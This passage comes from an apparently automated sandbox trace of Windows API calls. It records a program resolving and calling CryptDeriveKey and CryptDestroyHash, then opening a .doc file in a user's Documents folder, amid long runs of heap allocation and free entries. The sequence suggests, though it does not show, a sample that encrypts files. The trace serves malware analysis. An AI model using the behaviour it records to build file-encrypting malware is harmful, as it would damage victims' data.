lpMultiByteStr=0x2e51d60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0264.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.459] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0264.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0264.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0264.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0264.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0264.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0264.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0264.461] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa875d0) returned 1 [0264.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0264.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0264.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0264.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0264.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0264.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0264.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0264.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0264.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0264.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0264.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0264.463] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.463] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.463] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.464] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0264.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0264.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69ac8 [0264.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0264.465] CryptDestroyHash (hHash=0xa87290) returned 1 [0264.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0264.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.469] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0264.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0264.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0264.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0264.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0264.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0264.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.476] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/J30FxxC-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\j30fxxc-.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0264.476] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0264.476] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0264.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0264.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0264.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0264.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0264.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 